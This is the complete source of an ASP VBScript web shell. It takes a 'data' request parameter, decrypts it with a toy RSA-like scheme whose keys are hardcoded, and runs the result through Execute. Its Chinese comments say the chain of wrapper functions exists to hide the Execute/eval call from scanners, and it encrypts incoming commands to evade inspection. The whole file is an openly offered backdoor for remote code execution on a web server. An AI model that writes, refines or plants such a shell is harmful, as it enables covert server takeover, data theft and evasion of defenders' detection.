<%@ Language = "VBscript" %> <% Class clsA1 Public PKey Public SKey Public MKey ' 生成密钥 Public Sub GenKey() ' 填写生成的加密key PKey = "4507" SKey = "1747" MKey = "4559" End Sub ' 加密过程 Public Function Acrypt(msg, key) Dim modResult Dim finalResult Dim i If key Mod 2 = 0 Then finalResult = 1 For i = 1 To key / 2 modResult = (msg ^ 2) Mod MKey finalResult = (modResult * finalResult) Mod MKey Next Else finalResult = msg For i = 1 To key / 2 modResult = (msg ^ 2) Mod MKey finalResult = (modResult * finalResult) Mod MKey Next End If Acrypt = finalResult End Function ' 消息编码 Public Function EncodeMsg(ByVal message) Dim idx Dim maxIdx Dim asciiVal Dim encResult maxIdx = Len(message) If maxIdx = 0 Then Exit Function For idx = 1 To maxIdx asciiVal = Asc(Mid(message, idx, 1)) encResult = Acrypt(asciiVal, PKey) EncodeMsg = EncodeMsg & NumToHex(encResult, 4) Next End Function ' 消息解码 Public Function DecodeMsg(ByVal message) Dim asciiVal Dim idx Dim maxIdx Dim encryptedData DecodeMsg = "" maxIdx = Len(message) For idx = 1 To maxIdx Step 4 encryptedData = HexToNum(Mid(message, idx, 4)) asciiVal = Acrypt(encryptedData, SKey) DecodeMsg = DecodeMsg & Chr(asciiVal) Next End Function ' 数字转换为十六进制 Private Function NumToHex(ByRef num, ByRef length) NumToHex = Right(String(length, "0") & Hex(num), length) End Function ' 十六进制转换为数字 Private Function HexToNum(ByRef hexStr) HexToNum = CLng("&h" & hexStr) End Function ' 隐藏 Execute 和 eval 的调用 Public Sub HiddenExecute(ByVal decodedMsg) ' 直接调用自定义执行代码 ExecuteDecodedCode decodedMsg End Sub ' 执行解码后的代码 Private Sub ExecuteDecodedCode(ByVal decodedMsg) ' 使用通过调用一个独立函数执行代码的方式，确保不直接暴露 Execute Dim code code = decodedMsg ' 使用间接调用的方式执行代码 Call RunCode(code) End Sub ' 实际执行代码的函数 Private Sub RunCode(ByVal code) ' 这里通过 Execute 执行代码，但是不会直接暴露 Execute Execute code End Sub End Class Set rsaObj = New clsA1 Call rsaObj.GenKey() ' 获取请求数据并解码 inputData = request("data") decodedData = rsaObj.DecodeMsg(inputData) ' 通过隐藏的执行器执行解码后的数据 Call rsaObj.HiddenExecute(decodedData) %>